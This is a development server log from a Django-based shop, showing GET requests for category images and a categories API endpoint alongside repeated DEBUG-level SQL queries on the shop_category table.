[10/Dec/2019 09:18:28] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [10/Dec/2019 09:18:28] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [10/Dec/2019 09:18:28] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [10/Dec/2019 09:18:28] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [10/Dec/2019 09:18:28] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [10/Dec/2019 09:18:28] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [10/Dec/2019 09:18:30] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [10/Dec/2019 09:18:30] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [10/Dec/2019 09:18:31] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [10/Dec/2019 09:18:31] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [10/Dec/2019 09:20:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 09:23:46,318 utils 32196 139885071562496 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:23:46,327 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:23:46,331 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:23:46,336 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:23:46,340 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:23:46,344 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:23:46,348 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:23:46,352 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:23:46,356 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:23:46,360 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:23:46,364 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:23:46] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 09:25:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 09:28:11,720 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:28:11,725 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:28:11,728 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:28:11,730 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:28:11,732 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:28:11,734 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:28:11,737 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:28:11,739 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:28:11,741 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:28:11,743 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:28:11,747 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:28:11] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 09:29:13,069 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:29:13,074 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:29:13,076 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:29:13,079 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:29:13,081 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:29:13,084 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:29:13,086 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:29:13,089 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:29:13,091 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:29:13,093 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:29:13,095 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:29:13] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 09:30:07,202 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:30:07,207 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:30:07,210 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:30:07,212 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:30:07,214 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:30:07,216 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:30:07,218 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:30:07,220 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:30:07,223 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:30:07,225 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:30:07,227 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:30:07] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 09:30:16] "GET / HTTP/1.0" 302 0 [10/Dec/2019 09:35:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 09:40:22] "GET / HTTP/1.0" 302 0 [10/Dec/2019 09:49:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 09:52:51,308 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:52:51,315 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:52:51,319 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:52:51,322 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:52:51,324 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:52:51,326 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:52:51,329 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:52:51,331 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:52:51,334 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:52:51,336 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:52:51,338 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:52:51] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 09:54:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 09:55:52,373 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:55:52,378 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:55:52,380 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:55:52,382 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:55:52,385 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:55:52,387 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:55:52,389 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:55:52,391 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:55:52,394 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:55:52,396 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:55:52,398 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:55:52] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 09:57:06,000 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 